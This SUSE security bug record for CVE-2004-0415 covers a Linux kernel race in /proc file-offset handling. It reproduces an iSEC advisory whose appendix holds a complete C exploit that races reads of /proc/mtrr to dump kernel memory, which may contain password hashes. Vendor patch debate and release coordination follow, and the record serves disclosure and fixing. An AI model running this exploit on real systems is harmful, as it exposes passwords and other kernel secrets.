Bug 56074 (CVE-2004-0415) - VUL-0: CVE-2004-0415: kernel: /proc info leak
Summary: VUL-0: CVE-2004-0415: kernel: /proc info leak
Status: VERIFIED FIXED
Alias: CVE-2004-0415
Product: SUSE Security Incidents
Classification: Novell Products
Component: Incidents (show other bugs)
Version: unspecified
Hardware: All Linux
: P3 - Medium : Major
Target Milestone: ---
Assignee: Thomas Biege
QA Contact: Security Team bot
URL:
Whiteboard: CVE-2004-0415: CVSS v2 Base Score: 2....
Keywords:
Depends on:
Blocks:
 
Reported: 2004-05-24 20:28 UTC by Roman Drahtmueller
Modified: 2021-10-04 08:49 UTC (History)
3 users (show)

See Also:
Found By: Other
Services Priority:
Business Priority:
Blocker: ---
Marketing QA Status: ---
IT Deployment: ---


Attachments
vendor-sec discussion (32.40 KB, text/plain)
2004-06-28 14:35 UTC, Thomas Biege
Details
forwarded by Alan Cox, work from Al Viro, needs review. (105.19 KB, patch)
2004-06-29 05:09 UTC, Roman Drahtmueller
Details | Diff
from Solar designer via vendor-sec. (4.06 KB, patch)
2004-06-29 05:30 UTC, Roman Drahtmueller
Details | Diff
preliminary, from Al Viro, against 2.4 kernels. (95.75 KB, patch)
2004-06-29 18:13 UTC, Roman Drahtmueller
Details | Diff

Note You need to log in before you can comment on or make changes to this bug.
Description Sebastian Krahmer 2004-05-24 20:28:45 UTC
Date: Mon, 24 May 2004 13:52:43 +0200 (CEST)
From: Paul Starzetz <ihaquer@isec.pl>
Reply-To: isec@isec.pl
To: vendor-sec <vendor-sec@lst.de>
Subject: [vendor-sec] Proc leaks

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1


Synopsis:  Linux kernel file system signedness issues
Product:   Linux kernel
Version:   2.4 up to to and including 2.4.26, 2.6 up to to and including 2.6.6
Vendor:    http://www.kernel.org/
URL:       http://isec.pl/vulnerabilities/ ?
CVE:       not assigned
Author:    Paul Starzetz <ihaquer@isec.pl>
Date:      May 24, 2004

Issue:
======

A critical security vulnerability has been found in the Linux kernel while 
handling file offset pointers. 


Details:
========

The Linux kernel offers a file handling API to the applications. Basically a 
file can be identified by a file name and opened through the open(2) system call
which in turn returns a file descriptor for the file ressource.

One of the properties of a file is also something called 'file offset' which is 
advanced if one reads or writtes to the file. It can also by changed through the
lseek(2) system call and identifies the current writing/reading position.


There are two different versions of the file handling API inside the kernel: the
old 32 bit and the new (LFS) 64 bit API. We have identified numerous places 
where invalid conversions from 64 bit sized file offsets to 32 bit ones. 

We have found that most of the /proc entries (like /proc/version) leaks about 
one page of unitialized kernel memory and can be used to obtain sensitive data.

We have found a dozen of places with suspicious or bogus code. One of them 
resides in the MTRR handling code for the i386 architecture:


static ssize_t mtrr_read (struct file *file, char *buf, size_t len,
         loff_t *ppos)
{
[1] if (*ppos >= ascii_buf_bytes) return 0;
[2] if (*ppos + len > ascii_buf_bytes) len = ascii_buf_bytes - *ppos;
    if ( copy_to_user (buf, ascii_buffer + *ppos, len) ) return -EFAULT;
[3] *ppos += len;
    return len;
}   /*  End Function mtrr_read  */


It is quite easy to see that since copy_to_user can sleep, the second reference 
to *ppos may use another value. To conclude: code operating on the file->f_pos 
variable through a pointer must be atomic in respect to the current thread. We 
expect more troubles in the SMP case though.


Exploitation:
=============

In the following we want to concentrate onto the mttr.c code, however we think 
that also other pieces of the kernel code may be exploitable.

The idea is to use the blocking property of copy_to_user to advance the 
file->f_pos file offset to be negative allowing us to bypass the two checks 
marked with [1] and [2] in the above code.
The idea is to use the blocking property of copy_to_user to advance the 
file->f_pos file offset to be negative allowing us to bypass the two checks 
marked with [1] and [2] in the above code.

There are two situation where copy_to_user() will sleep if there is no page 
table entry for the corresponding location in the user buffer:

- - the underlying buffer maps a file which is not in the page cache. The file 
must be first rwad from the disk

- - the mmap_sem of the process is in a closed state, that means another thread 
sharing the same VM caused a down_write on the semaphore.

We use the second method as follows. One of two threads sharing same VM issues a
madvise(2) call on a VMA that maps some, sufficiently big file setting the 
madvise flag to WILLNEED. This will issue a down_write on the mmap semaphore and
schedule a read-ahead request for the mmaped file.

Second thread issues in the mean time a read on the /proc/mtrr file thus going 
for sleep until the first thread returns from the madvise system call. The 
threads will be woken up in a FIFO manner thus the first thread will run as 
first and can advance the file pointer of the proc file to the maximum possible 
value of 0x7fffffffffffffff while the second thread is still waiting in the 
scheduler queue for CPU.

After the place marked with [3] has been executed, the file position will have a
negative value and the checks [1] and [2] can be passed for any user buffer 
length thus leaking the kernel memory from the address of ascii_buffer on.

We have attached a proof-of-concept exploit code.


Impact:
=======

Since no special privileges are required to open the /proc/mtrr file for reading
any process may exploit the bug to read huge parts of kernel memory.

The kernel memory dump may include very sensitive information like hashed 
passwords from /etc/shadow or even the root passwort. We have found that after 
the root user logged in using ssh, the root passwort was keept in kernel memory.
This is very surprising since sshd will quickly clean the memory containing the 
supplied password. But the password may have made its way through various kernel
paths like pipes or sockets.

Tested and known to be vulnerable kernel versions are all <= 2.4.26 and <= 
2.6.5. All users are encouraged to patch all vulnerable systems as soon as 
appropriate vendor patches are released. There is no hotfix for this 
vulnerability. 

Credits:
========

Paul Starzetz <ihaquer@isec.pl> has identified the vulnerability and performed 
further research. COPYING, DISTRIBUTION, AND MODIFICATION OF INFORMATION 
PRESENTED HERE IS ALLOWED ONLY WITH EXPRESS PERMISSION OF ONE OF THE AUTHORS.


Disclaimer:
===========

This document and all the information it contains are provided "as is", for 
educational purposes only, without warranty of any kind, whether express or 
implied.

The authors reserve the right not to be responsible for the topicality, 
correctness, completeness or quality of the information  provided in this 
document. Liability claims regarding damage caused by the use of any information
provided, including any kind of information which is incomplete or incorrect, 
will therefore be rejected.


Appendix:
=========

/*
 *
 *      /proc ppos kernel memory read
 *
 *     the semaphore method
 *
 *     by IhaQueR
 *
 *      Copyright (c) 2004  iSEC Security Research. All Rights Reserved.
 *
 *      THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED "AS IS"
 *      AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION
 *      WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED.
 *
 */


#define _GNU_SOURCE

#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <string.h>
#include <errno.h>

#include <unistd.h>
#include <fcntl.h>
#include <time.h>
#include <sched.h>

#include <sys/socket.h>
#include <sys/select.h>
#include <sys/time.h>
#include <sys/mman.h>

#include <linux/unistd.h>
#include <asm/page.h>


//     machine mem size in MB
#define MEMSIZE64



_syscall5(int, _llseek, uint, fd, ulong, hi, ulong, lo, loff_t *, res, uint,
wh);



void fatal(const char *msg)
{
       printf("\n");
       if(!errno) {
       fprintf(stderr, "FATAL: %s\n", msg);

       }
       else {
       perror(msg);
       }

       printf("\n");
       fflush(stdout);
       fflush(stderr);
       exit(1);
}


static int cpid, nc, fd, pfd, r=0, i=0, csize, fsize=1024*1024*MEMSIZE,
size=PAGE_SIZE, us;
static volatile int go[2];

static loff_t off;
static char *buf=NULL, *file, child_stack[PAGE_SIZE];
static struct timeval tv1, tv2;
static struct stat st;


//     child close sempahore & sleep
int start_child(void *arg)
{
//     unlock parent & close semaphore
       go[0]=0;
       madvise(file, csize, MADV_DONTNEED);
       madvise(file, csize, MADV_SEQUENTIAL);
       gettimeofday(&tv1, NULL);
       read(pfd, buf, 0);

       go[0]=1;
       r = madvise(file, csize, MADV_WILLNEED);
       if(r)
       fatal("madvise");

//     parent blocked on mmap_sem? GOOD!
       if(go[1] == 1 || _llseek(pfd, 0, 0, &off, SEEK_CUR)<0 ) {
       r = _llseek(pfd, 0x7fffffff, 0xffffffff, &off, SEEK_SET);
       if( r == -1 )
       fatal("lseek");
       printf("\n[+] Race won!"); fflush(stdout);
       go[0]=2;
       } else {
       printf("\n[-] Race lost %d, use another file!\n", go[1]); fflush(stdout);
       kill(getppid(), SIGTERM);
       }
       _exit(1);

return 0;
}


void usage(char *name)
{
       printf("\nUSAGE: %s <file not in cache>", name);
       printf("\n\n");
       exit(1);
}


int main(int ac, char **av)
{
       if(ac<2)
       usage(av[0]);

//     mmap not cached file
       r=stat(av[1], &st);
       if(r)
       fatal("stat file");

       csize = (st.st_size + (PAGE_SIZE-1)) & ~(PAGE_SIZE-1);

       fd=open(av[1], O_RDONLY);
       if(fd<0)
       fatal("open file");
       file=mmap(NULL, csize, PROT_READ, MAP_SHARED, fd, 0);
       if(file==MAP_FAILED)
       fatal("mmap");
       close(fd);
       printf("\n[+] mmaped uncached file at %p - %p", file, file+csize);
fflush(stdout);

//     open proc file
       pfd=open("/proc/mtrr", O_RDONLY);
       if(pfd<0)
       fatal("open");

//     open storage file
       fd=open("kmem.dat", O_RDWR|O_CREAT|O_TRUNC, 0644);


       if(fd<0)
       fatal("open data");

//     truncate to memsize
       r=ftruncate(fd, fsize);
       if(r<0)
       fatal("ftruncate");

       buf=mmap(NULL, fsize, PROT_READ|PROT_WRITE, MAP_SHARED, fd, 0);
       if(buf==MAP_FAILED)
       fatal("mmap");
       close(fd);
       printf("\n[+] mmaped kernel data file at %p", buf); fflush(stdout);

//     clone thread wait for child sleep
       nc = nice(0);
       cpid=clone(&start_child, child_stack + sizeof(child_stack)-4,
CLONE_FILES|CLONE_VM, NULL);
       nice(19-nc);
       while(go[0]==0) {
       i++;
       }

//     try to read & sleep & move fpos to be negative
       gettimeofday(&tv1, NULL);
       go[1] = 1;
       r = read(pfd, buf, size );
       go[1] = 2;
       gettimeofday(&tv2, NULL);
       if(r<0)
       fatal("read");
       while(go[0]!=2) {
       i++;
       }

       us = tv2.tv_sec - tv1.tv_sec;
       us *= 1000000;
       us += (tv2.tv_usec - tv1.tv_usec) ;

       printf("\n[+] READ %d bytes in %d usec", r, us); fflush(stdout);
       r = _llseek(pfd, 0, 0, &off, SEEK_CUR);
       if(r < 0 ) {
       printf("\n[+] SUCCESS, lseek fails, reading kernel mem...\n");
fflush(stdout);
       i=0;
       for(;;) {
       r = read(pfd, buf, PAGE_SIZE );
       if(r!=PAGE_SIZE)
       break;
       buf += PAGE_SIZE;
       i++;
       printf("\r    PAGE %6d", i); fflush(stdout);
       }
       printf("\n[+] done, err=%s", strerror(errno) ); fflush(stdout);
       }
       close(pfd);
       printf("\n");
       sleep(1);
       kill(cpid, 9);

return 0;
}

- -- 
Paul Starzetz
iSEC Security Research
http://isec.pl/
Comment 1 Sebastian Krahmer 2004-05-24 20:28:45 UTC
<!-- SBZ_reproduce  -->
...
Comment 2 Sebastian Krahmer 2004-05-25 16:39:36 UTC
CAN-2004-0415
Comment 3 Thomas Biege 2004-05-27 16:31:47 UTC
CDR: Tuesday, June 29th, 16:00 MEST 
Comment 4 Hubert Mantel 2004-06-16 18:44:48 UTC
Do we have fixes for this problem?
Comment 5 Thomas Biege 2004-06-18 17:42:42 UTC
Not so far. But people start working on it... 
Comment 6 Ralf Flaxa 2004-06-18 17:47:49 UTC
I am willing to accept a (tested) patch last minute before Goldmaster 
for this. My Goldmaster is June 30th, so this would work. But keep in 
mind that we give our partners our current kernels, so this should 
be checked in last minute (June 28th/28th). 
Comment 7 Hubert Mantel 2004-06-21 22:29:07 UTC
I'm currently in the process of preparing the 2.4 based update kernels. Since
release date is June, 29th, I really urgently need the fix. And of course we
also need it for SLES9 GA...
Comment 8 Thomas Biege 2004-06-22 15:22:36 UTC
fixing this issue seems not to be easy... (see vendor-sec@) 
Comment 9 Andreas Gruenbacher 2004-06-26 17:14:53 UTC
Thomas, can you put the vendor-sec discussion somewhere where I can read it? Thanks?
Comment 10 Thomas Biege 2004-06-28 14:35:16 UTC
Created attachment 21716 [details]
vendor-sec discussion
Comment 11 Roman Drahtmueller 2004-06-29 05:09:51 UTC
Created attachment 21755 [details]
forwarded by Alan Cox, work from Al Viro, needs review.
Comment 12 Roman Drahtmueller 2004-06-29 05:29:40 UTC
From: Solar Designer <solar@openwall.com>
To: vendor-sec@lst.de
Date: Tue, 29 Jun 2004 00:18:33 +0400
Subject: [vendor-sec] workaround for the f_pos races
Parts/Attachments:
   1 Shown     55 lines  Text
   2   OK     139 lines  Text
----------------------------------------

Hi,

The patch Alan has posted looks good, but it's clear that in a patch
this large there must be bugs.  And it probably still misses some
broken read/write routines.

I'd like to propose an alternative approach which, when implemented
cleaner than in the attached patch, might be more appropriate for
preliminary vendor updates which are to be released in a matter of
days (if not hours).

I went ahead and introduced a mutex into struct file and I'm using the
mutex to serialize all seek/read/write activity on a given fd.

I've verified that my patch defeats Paul's mtrr exploit.  It still
thinks it wins the race, but the resulting kmem dump does not contain
anything but the usual /proc/mtrr data:

david!sources:/tmp$ ./isec-mtrr-ppos /usr/lib/librpm-4.2.so 
[+] mmaped uncached file at 0x25f000 - 0x3eb000
[+] mmaped kernel data file at 0x40000000
[+] Race won!
[+] READ 0 bytes in 13946 usec
david!sources:/tmp$ strings kmem.dat 
reg00: base=0x00000000 (   0MB), size= 512MB: write-back, count=1
reg01: base=0x20000000 ( 512MB), size= 256MB: write-back, count=1
david!sources:/tmp$ 

Known disadvantages of this approach:

- it breaks binary compatibility with old kernel modules (although in
practice old modules will just work most of the time, -- mine do), but
this happens between kernel releases anyway;

- it might break some third-party kernel patches which allocate new
struct file's, but won't know to initialize the mutex;

- the serialization is more strict than was absolutely necessary to
avoid the security issue (but is this a disadvantage?)

Known problems with the patch in its present form:

- it does not honor O_NONBLOCK when concurrent calls for the same fd
are made by different threads of an application;

- not all instances of ->{read,write} are covered, -- most of the
remaining probably can't be triggered, -- for example, those in binary
loaders shouldn't be triggerable since there's no fexec(), -- but
there're some which need to be patched too (those which pertain to
32-bit syscall emulation on 64-bit platforms).

Thoughts?

-- 
/sd
Comment 13 Roman Drahtmueller 2004-06-29 05:30:50 UTC
Created attachment 21757 [details]
from Solar designer via vendor-sec.
Comment 14 Roman Drahtmueller 2004-06-29 05:32:56 UTC
From: viro@parcelfarce.linux.theplanet.co.uk
To: Solar Designer <solar@openwall.com>
Cc: vendor-sec@lst.de
Date: Mon, 28 Jun 2004 21:55:48 +0100
Subject: Re: [vendor-sec] workaround for the f_pos races

On Tue, Jun 29, 2004 at 12:18:33AM +0400, Solar Designer wrote:
> I went ahead and introduced a mutex into struct file and I'm using the
> mutex to serialize all seek/read/write activity on a given fd.
 
> Thoughts?

You'll never get that merged upstream.  It's a huge overkill and it _still_
doesn't solve the problems with broken wraparound checks, etc.  Said problems
are much more widespread than race-related "how to get negative offset"
stuff - just check the patch.  Moreover, for absolute majority of instances
we don't need any locks at all, since these guys do not accept offsets
past 4Gb, making updates of offset atomic for all practical purposes.
_______________________________________________

Comment 15 Roman Drahtmueller 2004-06-29 05:33:56 UTC
From: Alan Cox <alan@lxorguk.ukuu.org.uk>
To: Solar Designer <solar@openwall.com>
Cc: vendor-sec@lst.de
Date: Mon, 28 Jun 2004 21:04:23 +0100
Subject: Re: [vendor-sec] workaround for the f_pos races

On Llu, 2004-06-28 at 21:18, Solar Designer wrote:
> I went ahead and introduced a mutex into struct file and I'm using the
> mutex to serialize all seek/read/write activity on a given fd.
> - it does not honor O_NONBLOCK when concurrent calls for the same fd
> are made by different threads of an application;

You get deadlocks as well as killing system performance. I really
do think there is a case for a set of helpers here for many of the users
(and actually for a lot conversion to seq_* as recommended by Al would
fix them).

A lot of the drivers would benefit from a simple set of lseek/read/write
helpers. I might try and make the case for that with Linus after the
panic is over.

_______________________________________________
Comment 16 Roman Drahtmueller 2004-06-29 05:35:05 UTC
From: Solar Designer <solar@openwall.com>
To: viro@parcelfarce.linux.theplanet.co.uk
Cc: vendor-sec@lst.de
Date: Tue, 29 Jun 2004 01:13:28 +0400
Subject: Re: [vendor-sec] workaround for the f_pos races

On Mon, Jun 28, 2004 at 09:55:48PM +0100,
viro@parcelfarce.linux.theplanet.co.uk wrote:
> On Tue, Jun 29, 2004 at 12:18:33AM +0400, Solar Designer wrote:
> > I went ahead and introduced a mutex into struct file and I'm using the
> > mutex to serialize all seek/read/write activity on a given fd.
>  
> > Thoughts?
> 
> You'll never get that merged upstream.

I guess so.  But it's a pity.

Another interesting test case:

3< large_uncached_file_on_disk
cat <&3 > f1_on_tmpfs &
cat <&3 > f2_on_tmpfs &
wait
wc -c f?_on_tmpfs

With an unpatched kernel, the sum of sizes of f1 and f2 will usually
exceed the size of the original file, -- in my tests, by as much as 50%.
This feels wrong.

With my patch, the sum of sizes of f1 and f2 exactly matches the size
of large_uncached_file_on_disk.

> It's a huge overkill

I disagree.  I actually have a candidate application relying on the
above property, -- which I once thought the kernel guaranteed...

> and it _still_
> doesn't solve the problems with broken wraparound checks, etc.

Yes, it's against the races only.  As for broken wraparound checks, I
think we may add wraparound checks at this same higher layer once we
have the locks.  Simply not call f_op->read() with arguments which
would wraparound; instead, we can decrease the count for the call.

I just don't want to rely on hundreds of individual implementations to
be correct, -- I want to trap invalid input early on.

> Said problems
> are much more widespread than race-related "how to get negative offset"
> stuff - just check the patch.

OK, I trust you on this.

> Moreover, for absolute majority of instances
> we don't need any locks at all, since these guys do not accept offsets
> past 4Gb, making updates of offset atomic for all practical purposes.

You're assuming that the underlying f_ops are correct and don't load
*ppos multiple times, -- which we know was not the case and will not
be the case for many drivers which are yet to be developed by others.

You're also only talking of the security aspect of it, -- but some of
it is about correctness, not only security.  See my example above.

Introducing locks at the higher layer like I did eliminates races even
for those poor f_ops which load *ppos multiple times.

-- 
/sd

Comment 17 Roman Drahtmueller 2004-06-29 05:37:03 UTC
I don't wrap this up into an attachment for speed.


From: Alan Cox <alan@lxorguk.ukuu.org.uk>
To: Solar Designer <solar@openwall.com>
Cc: viro@parcelfarce.linux.theplanet.co.uk, vendor-sec@lst.de
Date: Mon, 28 Jun 2004 21:28:46 +0100
Subject: Re: [vendor-sec] workaround for the f_pos races

On Llu, 2004-06-28 at 22:13, Solar Designer wrote:
> I disagree.  I actually have a candidate application relying on the
> above property, -- which I once thought the kernel guaranteed...

I had that argument with Al yesterday and having been over SUSv2
the only thing it really has a lot to say on is O_APPEND, which does
seem buggered on UDF.

The wrap check has the problem we don't know _what_ the wrapping
limit for the code is - 2Gb, 4Gb, 2^63 and 2^62 all appear, as
does 2^16 bytes! - thus a helper function can do good stuff here
but not top level code
_______________________________________________
Comment 18 Roman Drahtmueller 2004-06-29 05:38:09 UTC
From: viro@parcelfarce.linux.theplanet.co.uk
To: Solar Designer <solar@openwall.com>
Cc: vendor-sec@lst.de
Date: Mon, 28 Jun 2004 22:29:43 +0100
Subject: Re: [vendor-sec] workaround for the f_pos races

On Tue, Jun 29, 2004 at 01:13:28AM +0400, Solar Designer wrote:
> Another interesting test case:
> 
> 3< large_uncached_file_on_disk
> cat <&3 > f1_on_tmpfs &
> cat <&3 > f2_on_tmpfs &
> wait
> wc -c f?_on_tmpfs
> 
> With an unpatched kernel, the sum of sizes of f1 and f2 will usually
> exceed the size of the original file, -- in my tests, by as much as 50%.
> This feels wrong.
> 
> With my patch, the sum of sizes of f1 and f2 exactly matches the size
> of large_uncached_file_on_disk.
> 
> > It's a huge overkill
> 
> I disagree.  I actually have a candidate application relying on the
> above property, -- which I once thought the kernel guaranteed...

... until you went and checked it on some Unices and found that your
assumption was more than just "not guaranteed", it was actually wrong
on quite a few of them.  Correct?

Which makes any software relying on such assumption immediately broken.

FWIW, anybody who mixes read() and lseek() on the same descriptor without
logics in their code serializing those are also getting what they'd asked
for - GIGO.  It should not break the kernel, obviously, but kernel has no
business being nice to inherently racy userland code.  BTW, you do realize
that lseek() in the middle of read() on the same descriptor will be lost?
On regular files, on quite a few Unices, Linux included.

        IMNSHO, aside of security problem in the kernel it's a case of
"Doctor, It Hurts When I Do It".
_______________________________________________
Comment 19 Roman Drahtmueller 2004-06-29 05:49:40 UTC
From: Solar Designer <solar@openwall.com>
To: Alan Cox <alan@lxorguk.ukuu.org.uk>
Cc: vendor-sec@lst.de
Date: Tue, 29 Jun 2004 01:29:27 +0400
Subject: Re: [vendor-sec] workaround for the f_pos races

On Mon, Jun 28, 2004 at 09:04:23PM +0100, Alan Cox wrote:
> On Llu, 2004-06-28 at 21:18, Solar Designer wrote:
> > - it does not honor O_NONBLOCK when concurrent calls for the same fd
> > are made by different threads of an application;

Actually, upon a second thought I realize that O_NONBLOCK is a non-issue.
I can explain why not if needed.

> You get deadlocks

Would you care to illustrate that by an example?

I don't think I ever have a thread try to acquire a second f_pos_lock
when already holding one (on a different file).  I see no room for
deadlocks here.  But I might be missing something.

> as well as killing system performance.

I don't think this has a performance impact other than that associated
with the few extra assembly instructions executed to acquire and
release locks.  By far most of the time the locks will be acquired
immediately.  The only way there can be a delay is when another thread
is playing with the same fd in a manner which would change f_pos, --
that's already not normal given that Linux's behavior in that case is
pretty much undefined as illustrated by the example in my previous
e-mail.  But even then it's just increased latency for the pair of
operations on the fd.  Yes, they won't execute in parallel on SMP
(instead, a CPU will be available for use by other processes), -- but
what use is parallel execution if the end result would be undefined?

> I really
> do think there is a case for a set of helpers here for many of the users
> (and actually for a lot conversion to seq_* as recommended by Al would
> fix them).
> 
> A lot of the drivers would benefit from a simple set of lseek/read/write
> helpers. I might try and make the case for that with Linus after the
> panic is over.

I wonder what kind of helpers you have in mind here.  Care to provide
an example?

Thanks,

-- 
/sd
_______________________________________________
Comment 20 Roman Drahtmueller 2004-06-29 18:12:40 UTC
creating attachment with preliminary patch against 2.4 kernels.
Comment 21 Roman Drahtmueller 2004-06-29 18:13:54 UTC
Created attachment 21767 [details]
preliminary, from Al Viro, against 2.4 kernels.
Comment 22 Andreas Gruenbacher 2004-07-16 01:00:46 UTC
We have reviewed the complete patch (two people for each change), sent out
observations upstream, and received an update from Alan Cox. I have found a few
additional problems in the update. Building test kernels now; to me it's not
entirely clear how we will go about testing this, yet.
Comment 23 Thomas Biege 2004-07-22 23:22:34 UTC
4. august seems to be the new coordinated release date. 
Comment 24 Hubert Mantel 2004-07-23 23:13:20 UTC
Fix is in all our trees now except SLES7. Which is no longer maintained AFAIK.
Comment 25 Thomas Biege 2004-07-28 14:59:24 UTC
CRD: 3rd. August, 19:00 MEST 
Comment 26 Thomas Biege 2004-08-09 16:37:09 UTC
packages approved (expect for s390*) 
Comment 27 Roman Drahtmueller 2004-08-11 00:51:13 UTC
<!-- SBZ_reopen -->Reopened by draht@suse.de at Tue Aug 10 18:51:13 2004, took initial reporter krahmer@suse.de to cc
Comment 28 Roman Drahtmueller 2004-08-11 00:51:13 UTC
Re-opening, for possible missed /proc files in patch.
Waiting for Helmut...
Comment 29 Roman Drahtmueller 2004-08-13 20:51:18 UTC
Closing... Helmut has found that the file /proc/kcore doesn't have the fix.
Cannot be considered security-relevant, though, for DAC checks on that file, 
and for the actual purpose of the file: To provide kernel memory.
Comment 30 Thomas Biege 2009-10-13 20:23:15 UTC
CVE-2004-0415: CVSS v2 Base Score: 2.1 (AV:L/AC:L/Au:N/C:P/I:N/A:N)